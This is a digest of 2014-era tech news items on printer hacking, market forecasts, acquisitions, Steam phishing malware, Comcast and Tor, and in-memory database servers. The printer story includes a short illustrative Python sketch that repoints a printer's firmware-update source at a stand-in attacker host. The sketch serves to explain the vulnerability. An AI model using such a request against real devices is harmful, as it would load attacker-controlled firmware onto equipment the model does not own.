Doom for hacked printer

In what has to be the best proof of concept hacking of a printer, Context Information Security analyst Michael Jordon managed to get a Canon Pixma printer to run the game Doom.

Jordon said that Canon Pixma wireless printers have a web interface that shows information about the printer, for example the ink levels, which allows for test pages to be printed and for the firmware to be checked for updates.

He found that the interface doesn't need any sort of authentication to access, and while you would think the worst anyone could do is print off hundreds of test pages and use up all the printer's ink, Jordon found a hacker could do a lot more damage.

The interface lets you trigger the printer to update its firmware. It also lets you change where the printer looks for the firmware update.
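To make the attack concrete, here is a minimal sketch of how an unauthenticated web interface like this could be abused. The endpoint and parameter names (`update_settings`, `firmware_url`) are invented for illustration – the real Pixma interface differs:

```python
from urllib.parse import urlencode

# Hypothetical sketch: if a printer's web UI accepts unauthenticated
# GET requests, repointing its firmware-update source at an attacker's
# server is just a crafted URL. Names here are made up for illustration.
def build_firmware_redirect(printer_ip: str, evil_server: str) -> str:
    """Return the URL an attacker would request to repoint the
    printer's firmware-update check at their own server."""
    params = urlencode({"firmware_url": f"http://{evil_server}/doom.fw"})
    return f"http://{printer_ip}/update_settings?{params}"

if __name__ == "__main__":
    url = build_firmware_redirect("192.168.1.50", "attacker.example.com")
    print(url)
```

From there, the next firmware "update" the printer fetches is whatever the attacker serves.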

A hacker could create custom firmware that spies on everything the printer prints; the printer could even be used as a gateway into the network.

To show what was possible Jordon got the printer to run Doom.

Canon offers very little protection against this. If you can run Doom on a printer, you can do a lot more nasty things. In a corporate environment, it would be a good place to be.

Who suspects printers? Well, other than Nigel from accounts, and he thinks aliens are trying to take over the coffee machine.

Canon has promised that it is working on a fix and is taking a chainsaw to the problems highlighted by Context.

“All PIXMA products launching from now onwards will have a username/password added to the PIXMA web interface, and models launched from the second half of 2013 onwards will also receive this update, models launched prior to this time are unaffected,” Canon said.


UK biggest public sector IT spender

While the UK is the biggest public sector IT spender, growth is very slow.

That’s according to a report from IDC, which surveyed western European spending in the IT sector.

The big five western European countries – the UK, Germany, France, Spain and Italy – represent over 75 percent of the $53 billion spent on hardware, software and IT services by the different governments. Over 50 percent of the spend takes place in local government.

IDC says that public administration and compulsory social activities are the largest spenders within the sector.

It predicts that investment in pension administration and in tax and revenue collection management will grow more than investment in public safety and security. Some areas, however, such as immigration and borders, are also attracting spending.

Germany will show the highest compound annual growth rate with a measly 1.2 percent, while Spain and Italy will suffer the biggest slump.

Toshiba releases 20 megapixel sensor

The chip division of Japanese giant Toshiba said it has started making fast 20 megapixel CMOS image sensors aimed at the high end smartphone market. Samples went out last month and full production will start in February next year.

That type of sensor will give a smartphone the kind of capabilities more associated with high end and expensive digital cameras.

The sensor, built on a 1.12 micron CMOS process, has an optical size of 1/2.4 inch and lets camera modules on smartphones be built to a height of 6mm or less. The chip has a pixel count of 5384×3752 with digital zoom capabilities, and includes 16Kbit memory.

The sensor – dubbed the T4KA7 – delivers a frame rate of 22 frames per second at full resolution image capture. That's an improvement of 83 percent compared to Toshiba's previous 20MP sensor.
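The quoted numbers hang together: 5384 × 3752 pixels is just over 20 megapixels, and at 22 frames per second the sensor reads out roughly 444 megapixels of data every second:

```python
# Quick sanity check on the T4KA7's quoted specifications.
width, height = 5384, 3752
fps = 22

megapixels = width * height / 1e6
pixels_per_second = width * height * fps

print(f"{megapixels:.1f} MP")                 # 20.2 MP
print(f"{pixels_per_second / 1e6:.0f} MP/s")  # 444 MP/s
```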

A Toshiba representative said that the sensor will let manufacturers design next generation ultrathin, power aware high end mobile products.

The sensor will cost around $20 when bought in volume.

Toshiba said that the CMOS image sensor market will experience a compound annual growth rate (CAGR) of 10 percent between 2013 and 2018, with revenues reaching $13 billion.

Big Data gets very big indeed

Revenues for Big Data technology and services will be worth $41.5 billion by 2018, with the market currently growing at a 26.4 percent compound annual growth rate (CAGR).

That’s an estimate by market research company IDC. Ashish Nadkarni, research director at the company, said the hype was simmering down.  “This is a sign that the technologies are maturing and making their way into the fabric of how organisations operate and firms conduct their business,” he said.
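Working backwards from those figures – and assuming the 26.4 percent CAGR is measured from 2014, which IDC does not spell out – the market would be worth around $16 billion today:

```python
# Back out the implied current market size from IDC's 2018 forecast,
# assuming the CAGR runs over the four years 2014 -> 2018.
target_2018 = 41.5   # $ billion
cagr = 0.264
years = 4            # assumed base year of 2014

implied_2014 = target_2018 / (1 + cagr) ** years
print(f"Implied 2014 market: ${implied_2014:.1f} billion")  # ~$16.3 billion
```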

This year, infrastructure has a large share of the entire market, with a 48.2 percent slice of the Big Data pie.

While America leads the way in Big Data investment, it isn’t going to stay that way. EMEA and Asia Pacific have nearly 45 percent market share in infrastructure, software, and services.

IDC predicts there will be a mergers and acquisitions boom in the sphere.

Microsoft coughs $2.5 billion for Mojang

Software giant Microsoft said it has bought Mojang, the maker of the video game Minecraft, for $2.5 billion.

The Swedish company has sold over 50 million copies of the game, but the three founders will leave the company.

Mojang said on its website change is scary, but “it is going to be good though. Everything is going to be OK.”

Mojang said Minecraft had grown and grown like Topsy. “Though we’re massively proud of what Minecraft has become, it was never Notch’s intention for it to get this big.”

“Notch” is the brains behind Minecraft and the majority shareholder.  He doesn’t want to run such a big company and the pressure was getting too much. “The only option was to sell Mojang. He [Notch] will continue to do cool stuff though. Don’t worry about that.”

Driverless car growth set to surge

A staggering 42 million driverless vehicles will be on our roads by 2035.

That’s the prediction of market research company ABI Research which said the numbers of driverless cars will ramp from 1.1 million in 2024 to over 42 million in 2035.
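For what it's worth, ramping from 1.1 million vehicles to 42 million in 11 years implies a compound annual growth rate of roughly 39 percent – which shows just how aggressive the forecast is:

```python
# Implied CAGR of ABI Research's driverless car forecast.
start, end = 1.1e6, 42e6
years = 2035 - 2024  # 11 years

cagr = (end / start) ** (1 / years) - 1
print(f"Implied CAGR: {cagr:.1%}")  # 39.3%
```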

But these optimistic forecasts don’t take into account bottlenecks including user acceptance, security, liability and regulation.

Google has already been forced by the California Department of Motor Vehicles to test prototypes with steering wheel, brake and acceleration pedals installed.

Tesla said last week that it will move into the driverless car market but other car manufacturers are havering over making a decision.

“While autonomous driving under the control of a human standby driver is quickly gaining acceptance, robotic vehicles mostly remain out of bounds, especially for car manufacturers, despite Google’s recent announcement to start prototype testing. However, only driverless vehicles will bring the full range of automation benefits including car sharing; driverless taxis, and delivery vans; social mobility for kids, elderly, and impaired; and overall economic growth through cheaper and smoother transportation critical in an increasing number of smart mega cities. Many barriers remain but the path towards robotic vehicles is now firmly established with high rewards for those first-to-market,” said ABI Research director Dominique Bonte.

Majority of mobile apps are insecure

A Gartner report claimed that 75 percent of mobile applications fail the most basic security tests.

That poses threats for corporations, it said.  Enterprise employees download apps and also use mobile apps to access business networks. Such apps can violate enterprise policies and expose enterprises to threats.

Dionisio Zumerle, a principal analyst at Gartner, said: “Enterprises that embrace mobile computing and bring your own device (BYOD) strategies are vulnerable to security breaches unless they adopt methods and technologies for mobile application security testing and risk assurance. Most enterprises are inexperienced in mobile application security. Even when application security testing is undertaken, it is often done casually by developers who are mostly concerned with the functionality of applications, not their security.”

He claimed that vendors supplying static and dynamic application testing can prevent problems in the enterprise. And a new test, called behavioural analysis, is emerging for mobile apps.

He added: “Today, more than 90 percent of enterprises use third-party commercial applications for their mobile BYOD strategies, and this is where current major application security testing efforts should be applied. App stores are filled with applications that mostly prove their advertised usefulness. Nevertheless, enterprises and individuals should not use them without paying attention to their security. They should download and use only those applications that have successfully passed security tests conducted by specialised application security testing vendors.”

Often the biggest problem is misconfigured devices – for example, misusing personal cloud services through apps on smartphones and tablets.

Turin places a shroud on Microsoft

The Italian city of Turin, famous for its medieval Jesus shroud hoaxing, is dumping Microsoft and heading toward something more Open Saucy.

Turin is currently running Windows XP, which goes to show that its famous shroud is not the only medieval thing about the place.

Apparently Turin thinks that it can save €6 million over five years by switching from Windows XP to Ubuntu Linux in all of its offices.

The plan is to install it on 8,300 PCs, which will generate an immediate saving of roughly €300 per machine. This figure is made up of the cost of Windows and Office licences.
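The per-machine figure squares roughly with the headline number: 8,300 PCs at €300 each is about €2.5 million up front, with the rest of the claimed €6 million presumably accruing over the five years:

```python
# Turin's claimed up-front licence saving from the switch to Ubuntu.
pcs = 8300
saving_per_pc = 300  # euros: Windows plus Office licences

immediate_saving = pcs * saving_per_pc
print(f"Immediate saving: EUR {immediate_saving:,}")  # EUR 2,490,000
```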

Another good reason why Turin did not want to upgrade to Windows 8 is that its computers are so old their designs were found in Leonardo da Vinci’s scrapbooks, and it was not believed that the new Windows would run very well on them.

The switch to Ubuntu was officially approved in early August and is expected to take around a year and a half to complete.

The move has been talked about for two years. The project was temporarily put aside due to economic concerns — it probably would have been too costly switching from XP while Turin still had valid and paid licences running. Now that those Windows licences are expiring, however, the time is ripe to experiment with new products.

Turin is one of the biggest municipalities in Italy to switch to Open Source and it could be an example for other cities to follow.

Phishing Eskimo twitches to steal Steam Wallets

A new piece of phishing malware has taken over Twitch’s user pool, tempting users into a fake sweepstake or lottery so that it can nick cash from their Steam Wallets.

For those who came in late, Twitch is a video game-centric website on which people show live streams of game play to others. Amazon bought the site, which has about 50 million users, for $970 million in cash.

Dubbed Eskimo, the malevolent bot does not look out of place to usual visitors to the streaming site — live streamers, who earn cash via viewer subscriptions, frequently use bots in the chat area of their channels to push donations, inspire supporters and run promotions.

However, one of the bots has been cleaning out Steam inventories, which might hold rare digital collectibles, and Steam Wallets, which are funded with real-world money used to purchase games on Valve’s admired distribution platform.

F-Secure said Eskimo can wipe your Steam wallet, armory, and inventory dry. It even dumps your items for a discount in the Steam Community Market. Earlier variants were selling items with a 12 percent discount, but a recent sample showed that they changed it to 35 percent discount — to sell the items faster.

According to F-Secure, Eskimo asks users to follow a link to fill out a form for a raffle, which it claims gives them an opportunity to win digital weapons and collectibles for Counter-Strike: Global Offensive.

F-Secure says that once Eskimo has access to a Steam account, it will take screenshots, add new friends on Steam, accept friend requests, trade with new friends, buy items with Steam funds, send trade offers and accept trades. Once all of a user’s money has been used to purchase collectibles, the malware will trade all of the victim’s digital items to their new “friends.”

F-Secure says, “It might be helpful for the users if Steam were to add another security check for those trading several items to a newly added friend and for selling items in the market with a low price based on a certain threshold. This will help in lessening the damages done by this kind of threat.”


Apple’s iPhone 6 chip is a lemon

It looks like Apple’s new iPhone 6 has the same performance as its older gizmos, according to Hot Hardware’s benchmarking.

Normally one of the few things that is different about a new model iPhone is that it comes with a better chip. Last time it was the A7 System-on-Chip (SoC), the world’s first 64-bit smartphone processor.

Even Apple naysayers said that the A7 chip was rather good and dominated benchmark runs and consistently outperformed previous generation iPhone models.

However, if Apple fanboys were hoping for a performance bump from the iPhone 6 and iPhone 6 Plus, both of which sport a custom A8 SoC, they are going to be disappointed.

Hot Hardware noted only modest gains compared to the iPhone 5s. With its dual-core 1.4GHz Cyclone CPU and A8 GPU, the iPhone 6 scored 21,204.26 and earned a place at the top of the chart, though not by much. The iPhone 5s scored 20,253.80 in the same benchmark, so the iPhone 6 is less than 5 percent faster.
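The gap really is that small. Working from the two benchmark scores:

```python
# Relative benchmark gain of the iPhone 6 over the iPhone 5s.
iphone6 = 21204.26
iphone5s = 20253.80

gain = (iphone6 - iphone5s) / iphone5s
print(f"iPhone 6 over 5s: {gain:.1%}")  # 4.7%
```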

What is strange is that not only was everyone expecting a bigger performance gain, but the iPhone 6 launch live stream implied that the difference would be huge.

Apple said that the all-new A8 chip is its fastest yet, with CPU and graphics performance faster than the A7 chip’s, even while powering a larger display and incredible new features. And because it is designed to be so power efficient, the company said, the A8 chip can sustain higher performance.

Well it is sort of true – the chip is faster, but not by enough for anyone to notice.

According to Apple, it offers 84x faster graphics performance than the original iPhone and is up to 50x faster in CPU performance.

Hang on a minute, Apple is comparing its current chip with that of the first iPhone, which was released on June 29, 2007. Of course the iPhone 6 is going to be faster. However, this means that Apple is aware that its new chip is disappointing and it is trying to pretend it is hot.

World moves to smartphones

Fortune tellers at the Groupe Speciale Mobile Association (GSMA) have been consulting their tarot cards and are predicting that either there will be a tall dark stranger who will ask them out to lunch, or by the end of the decade there will be nine billion mobile connections across the globe.

If it is the latter, the GSMA predicts that three billion of those connections will be data terminals, dongles, routers and feature phones, while the other two thirds will be smartphone handsets.
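The split is simple arithmetic: three billion non-smartphone connections out of nine billion leaves six billion smartphones – two thirds of the total:

```python
# GSMA's forecast split of mobile connections by the end of the decade.
total = 9e9
non_smartphone = 3e9  # data terminals, dongles, routers, feature phones

smartphones = total - non_smartphone
share = smartphones / total
print(f"Smartphone share: {share:.0%}")  # 67%
```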

The organisation claims that the smartphone market is poised for huge growth over the next six years.  There are currently two billion handsets in active use.  It predicts that the demand is being driven by people in emerging countries.

In a report with the catchy title,  Smartphone forecasts and assumptions, 2007-2020, the GSMA said that developing economies overtook mature markets such as the US and western Europe in 2011.

GSMA chief strategy officer Hyunmi Yang said that in the hands of consumers, these devices are improving living standards and changing lives, especially in developing markets, while contributing to growing economies by stimulating entrepreneurship.

“As the industry evolves, smartphones are becoming lifestyle hubs that are creating opportunities for mobile industry players in vertical markets such as financial services, healthcare, home automation and transport,” she said.

Asia Pacific already accounts for half of global smartphone connections yet smartphone penetration is still below 40 percent in the region, even when China’s 629 million smartphone connections are included.

By the end of the decade, emerging countries will account for four in five smartphone connections, as regions like North America and Europe hit the 70-80 percent mark and growth drops off.

The fastest growing region is expected to be sub-Saharan Africa. When figures are based on smartphone adoption as a percentage of all mobile connections, the region currently has the lowest adoption rate of 15 percent in the world.

However, the wider availability of affordable handsets and the roll-out of networks are expected to change everything.

The GSMA claims that the main factor driving smartphone adoption in emerging countries is falling prices. The price difference between feature phones and smartphones is getting smaller and smaller, and $50 smartphones are now a reality.

Mature markets have seen operator subsidies and the roll-out of 4G networks helping to maintain growth in the premium end of the market, while more intelligent, individualised data plans are also helping to win consumers over from feature phones in all markets.

“Smartphones will be the driving force of mobile industry growth over the next six years, with one billion new smartphone connections expected over the next 18 months alone,” said Yang.

Comcast declares war on Tor

Comcast, the most popular telco in the US, famous for its happy customers and commitment to a positive future for an open internet, has declared war on the encrypted system Tor.

Comcast agents have contacted customers using Tor and instructed them to stop using the browser or risk being cut off.

According to Deep Dot Web, one Comcast agent named Jeremy insisted Tor was an “illegal service” and against usage policies. The agent then repeatedly asked the customer to tell him what sites he was accessing with the Tor browser. Of course, the customer told him to go forth and multiply.

What is scary is that Comcast knew the customer was using Tor at all. This would mean that Comcast is spying on the online activities of its users.

There is some bad blood between Tor and Comcast. The Tor Project has listed Comcast as a Bad ISP, citing Comcast’s Acceptable Use Policy for residential customers, which does not allow servers or proxies.

A Comcast spokesperson insisted that the outfit did respect customer privacy and security and would only investigate the specifics of a customer’s account with a valid court order.

However, this did not happen in the case of Comcast’s treatment of Ross Ulbricht, the alleged Dread Pirate Roberts.

Comcast previously collaborated with the FBI by providing information on alleged Silk Road mastermind Ross Ulbricht’s internet usage. Ulbricht was most certainly never given a warning by Comcast or given time to contact a lawyer before he was arrested in a San Francisco library last October.


Intel shows off in-memory-database Biz

Intel’s Developer Forum 2014 annual meeting at San Francisco’s Moscone Center wound down yesterday. My assignment is to continue research on a technology that’s now ramping.

The computer industry is at the beginning of a major architectural shift. “In-Memory Database” (IMD) systems, originally aimed at near real-time analytic problems, have successfully been applied to cognitive computing problems as well. The nascent application of “cognitive computing intelligence and predictive analytics” toolsets to IMD equipped servers is thought to be the first step in a new era in computing – quite possibly the next big thing.

The Google Effect
At the 2000 Intel Developer Forum in San Francisco a relatively unknown entrepreneur, while having a Keynote fireside chat with Andy Grove, said he’d like to take the entire Internet and put it in memory to speed it up – “The Web, a good part of the Web, is a few terabits. So it’s not unreasonable,” he said. “We’d like to have the whole Web in memory, in random access memory.”

The comment received a rather derisive reception from the audience and was quickly forgotten. The speaker was Larry Page, an unknown at the time, as was his startup, Google – whose backbone then consisted of 2,400 computers.

Fast forward to the present: system vendors have found that their future in Big Data has a lot of the look and feel of Google’s “free to the public” offering. Google was the first to successfully deploy a massively parallel processing (MPP) network commercially using commodity servers – one delivering real-time data access on a worldwide basis. Its competitors realized that they could no longer remain competitive with systems that relied on high latency rotating magnetic media as the main store – in fact, solid state disks (SSDs) are considered somewhat slow for the new realities of Big Data analytic computing.

The development – called “In-Memory Database” – mounts the entire database (a single system image, even an enormous one) into large scale memory arrays of Registered DIMMs closely coupled with multi-core processors. The resulting increase in throughput accelerates not only transaction processing but also analytic application performance into real time. The frosting on the cake is that this architecture change applies to good advantage in the emerging cognitive computing space.

SAP – HANA, In-Memory Database Computing
In 2006 Hasso Plattner, co-founder of SAP AG, took a bottle of red wine, a wine glass, some writing implements and paper to the garden behind his house. By the time he reached the bottom of the bottle there wasn’t much written on the paper, but he had reached the conclusion that in-memory systems were the future. Plattner had realized that for SAP to remain competitive it needed to innovate: he believed that changing the server design to accommodate massively parallel processing, with enough memory to load an entire database, combined with columnar based storage software, would have a revolutionary effect on processing speeds for OLTP and OLAP applications.

Gathering a small group of PhDs and undergrads at the Hasso Plattner Institute, Plattner set out the in-memory idea he wanted them to explore. The first prototype was shown in 2007 before an internal audience at the company’s headquarters in Walldorf, Germany. SAP management was skeptical that the idea would work – the team needed to prove that the concept of an in-memory database would hold up under real world conditions.

Using contacts to advance the project, Plattner persuaded Colgate-Palmolive Co. to provide transaction data for the project. He also persuaded Intel’s Craig Barrett to secure the latest microprocessors for the lab’s ongoing effort. The company also set up an R&D facility in Palo Alto to be in close proximity to its innovation and research partner, Stanford University.

SAP HANA was officially announced in May 2010, with shipments commencing with the release of SAP HANA 1.0 in November. The market was slow to adopt the technology, convinced it was still at an early stage of development. Analytics, and the need for a real reason for customers to move their IT to the cloud, provided the market conditions SAP’s HANA needed to press its adoption. Over time SAP adapted HANA to the cloud through successful partnering with a wide array of vendors, making it the company’s fastest growing segment.

During the development of HANA, SAP discovered the amount of physical memory required to store an entire database could be reduced substantially through compression – in some cases by 100X. This had the effect of reducing power (less memory required) and making database searches more efficient (reduction of the empty set). The market implication was that the price of memory per gigabyte had finally reached a price/performance breakeven point in an application that could not be served at that price any other way. DRAM producers have found their next “killer application”.
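Much of that compression comes from the columnar layout: a column with few distinct values can be dictionary-encoded, so each cell shrinks to a small integer index. A toy sketch of the idea – not SAP's actual implementation:

```python
def dictionary_encode(column):
    """Replace each value with an index into a dictionary of the
    column's distinct values -- the core trick behind columnar
    compression in in-memory databases."""
    dictionary = sorted(set(column))
    index = {value: i for i, value in enumerate(dictionary)}
    return dictionary, [index[v] for v in column]

# A column of country codes: eight strings collapse to three
# dictionary entries plus eight small integers.
column = ["DE", "US", "DE", "DE", "FR", "US", "DE", "FR"]
dictionary, codes = dictionary_encode(column)
print(dictionary)  # ['DE', 'FR', 'US']
print(codes)       # [0, 2, 0, 0, 1, 2, 0, 1]
```

On a real column with millions of rows and a handful of distinct values, the saving is dramatic.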

IBM’s Watson – Cognitive Computing Public Debut
IBM’s Watson is a Big Data analytics system running on 2,880 PowerPC cores with 16TBytes of DRAM. Estimated cost is reportedly just over $3 Million and it requires 200kW of power to operate. Watson’s inner workings have not been publicly released – what is known is that it runs under a tool IBM calls DeepQA, implemented in conjunction with Hadoop (a Java implementation of MapReduce) that runs under the SUSE Linux Enterprise Server Operating System.

IBM introduced Watson to the public by pitting it against human opponents on the game show “Jeopardy” in February 2011 – establishing IBM and the Watson brand in the public mind when it won the $1 million prize for charity.

Watson’s ability to semantically interpret language implies a native ability to understand the context of questions – including puns and word plays that it handled amazingly well – questions of this nature typically remain a significant challenge for machine-based systems.

Watson’s creators have stated that the algorithms are “embarrassingly” parallel – the implication that the core engine is highly MapReduce in nature rather than the more traditional graph analytics approach. Conventional network control is adequate for such an engine reducing costs and falls within a Software Defined Networking (SDN) framework.

IBM previously missed the industry shift in data management from ISAM files to relational databases in the 1970s, even though it invented the RDBMS. Oracle took full advantage of this colossal gaffe, much to IBM’s dismay.

IBM announced the establishment of the Watson Business Unit in early March, investing upwards of $1 billion in the new entity. What is surprising is that the company already had a fully established cloud based offering around Watson (now physically occupying three rack cabinets instead of the original nine), replete with a supporting ecosystem. There is no lack of customer interest in Watson, with over 1,000 third party developers signed up to date.

IBM emphasizes Watson’s natural language capabilities and analytics, which process and synthesize information in a manner similar to the way humans think – enabling quick comprehension and evaluation of large amounts of human style communication data to generate and evaluate evidence based hypotheses, and to adapt and learn from training, interaction and outcomes.

Server Commoditisation – IBM Going Fabless?
“Watson” is at the beginning of a bundling “strategy” by IBM that’s in line with its continued separation from its hardware origins. IBM’s internal politics sometimes show in decisions made by disparate groups within the company in efforts to preserve their own “silage”.

The persistent and widely spread rumor that IBM was selling their low-end server division began circulating in April 2013 with Lenovo the most likely buyer – it passed into obscurity before becoming a reality in January 2014. The trend toward server hardware commoditization is the driving force behind the sale. Margins in the low-end server space have decreased to the point where economies of scale must come into play – requiring ever-larger investments with ever decreasing margins draining capital away from the company’s core business strategy. Watson, on the other hand, is viewed as a “maximum best-fit scaling technology” for capitalizing on IBM’s capabilities as a company.

Recent rumors that IBM is accepting bids for its semiconductor operations are being taken seriously and lean toward GlobalFoundries as the favored bidder. IBM announced that it is investing $3 billion over five years in semiconductor research, in a move to reassure its customer base that the company is continuing basic research to advance hardware and software technology. The company has entered talks to sell the East Fishkill, N.Y. fab to GlobalFoundries, though a definitive agreement has yet to be announced.

IBM is slowly being transformed into a mostly software and services company using commodity, software defined hardware. That it’s going fabless is no surprise – the question is who will fill the void of developing next generation semiconductor processes and the attendant processor architectures.
In 2013 the odds were firmly on Intel – the lack of further commitment at IDF 2014 shakes this conclusion, but remember that the E7 version will not be ready for prime time till next year, or at best very late this calendar year.

Collaboration
IBM, having decided to take Watson to market, set out to solve cost, power and footprint issues through industry collaboration. That collaboration will have far ranging effects on the company, its hardware product line and industry partners.

IBM’s larger than usual presence at the Intel Developer Forum in 2013, with a keynote delivered by Diane Bryant, Intel senior vice president and general manager of the Data Center Group, further signaled IBM’s continued segue with Intel toward high end servers.
Intel’s Rack Scale Architecture

Intel has been developing its version of the “Disaggregated Server” named “Rack Scale Architecture” or RSA.

At the core of the Rack Scale Architecture is a technology Intel calls “Silicon Photonics” – developed under the premise that a system wide integrated silicon photonic data highway, woven into a hierarchical communication fabric, will support massively parallel computing systems into the foreseeable future and remain a baseline architectural model for future growth. Copper interconnects do not scale reliably in server systems at data rates much above 10 Gbps per channel (multiple fiber channels – ten of them – are combined to establish interconnects like 100 Gbit Ethernet).

The idea of a “silicon photonic” highway offers system architects freedom to allocate computational resources “at will”. This blends well with Software Defined Networking down to the computational element – essentially making an entire data center a virtual machine.

Key to this idea is the use of fiber optic cable capable of carrying data channels of 100 Gbps and up (a cluster of four fibers at 25 Gbps each), called “Silicon Photonics” by Intel.

Diane Bryant brought Andy Bechtolsheim – founder, chief development officer and chairman of Arista Networks – on stage to announce the company’s first shipments of its “Top of Rack” switch. Bechtolsheim stated that Intel’s Silicon Photonics solved the cost issue, allowing Arista’s TOR switch to enter the market. He added that switches extending transmission distance from 200 meters to 2 kilometers, required for cloud data centers, would be shipping in volume in Q1 CY 2015.

Intel’s Big Data Analytics Market Outlook
Diane Bryant saved the best for last in her keynote segment. She stated that McKinsey reported big data analytics can improve margins by up to 60 percent through increased sales per visit, improved management of inventory and optimized product pricing. The cost of compute has declined 40 percent and the cost of storage 100 percent, she said, making it truly cost feasible to deploy these big data analytic solutions. She added that the E5V3 analytic server units were covered in a separate announcement on Monday. Unfortunately nothing was said about the massive E7s now in development.

Hadoop
Bryant went on: “Within a couple of years Hadoop will be the number one application. It will be running on more servers than any other single application. It will be more common for enterprise IT than enterprise ERP systems. The big data market is growing at 35 percent CAGR and is projected to be a $150 billion business in silicon systems, software and professional services by 2020.”

TechEye Take Away
We’re not sure what happened between IBM and Intel – IBM’s presence at this year’s IDF was completely different from last year’s. Relationships between companies can take wild swings over internal problems that are kept far from the public eye, and we suspect that may well be the case here. IBM is most interested in the E7 version, which remains unannounced, though sources report it is scheduled for some time in Q1 2015. We think the apparent lack of mutual devotion is temporary and helps to quiet internal silo wars at IBM for the time being.

Do not be surprised if Intel’s Data Centre Group breaks out into a separate, standalone forum next year.

Intel is working on multiple technology fronts to develop next generation data center architectures capable of real time transaction processing and analytical processing. Keep in mind that these machines are completely capable of running cognitive intelligent computing – currently the domain of IBM – which will first ramp in 2015 in an application span called Cognitive Analytics.

Remembering that analytics also includes voice and real-time voice translation, there are wide implications for a number of consumer space applications – think of a gatekeeper service melded into cellular phone contracts.

At any rate, Mark Bohr is still holding court over Intel’s process development – one of the solid IDF anchors still left at the company. The news is that Intel can build 14 nm FinFET 300 mm wafers in volume and is well on its way to 7 nm with a stop at 10 nm.

BlackBerry buys a UK company

Mobile manufacturer BlackBerry said it has bought UK company Movirtu. Financial details of the transaction weren’t revealed.

Movirtu makes so-called virtual identities for mobile operators, letting many numbers be active on a single device.

BlackBerry said this helps with device management in bring your own device (BYOD) and corporate environments.

The Movirtu Virtual SIM platform lets business numbers and personal numbers be used on the same device, with separate billing for voice, data and messaging.

The advantage is that employees can use the same phone for both company business and their own personal use.

The Virtual SIM capabilities will be offered by BlackBerry through mobile operators for all main smartphone operating systems, including Android, iOS and Windows.

Curved screens don’t yet make the grade

A report said that even though Samsung and LG have products that use flexible OLED materials for their displays, they’re not really flexible screens yet.

Strategy Analytics (SA) said Samsung’s launch of the Note Edge last week and the LG G-Flex a few months back took curved screens one step closer to reality.

However, SA said that these smartphones are not really flexible screens but rather have curved rigid screens.

OLED screens offer a number of benefits over LCD screens because they are lighter, thinner and probably last longer.

But these devices are the precursors to truly flexible second generation screens, which will offer new designs such as smartphones with tablet sized foldable screens.

“A number of challenges will need to be overcome,” said Stuart Robinson, director at Strategy Analytics. “More of the phone’s components need to be flexible to make a truly flexible phone, not just the display. This includes the cover material, the batteries as well as the semiconductors and other components.”

Other challenges include tools and processes that will allow cost effective volume production, he said. He thinks it’s likely that flexible OLED displays will become the preferred display tech in products within the next 10 years.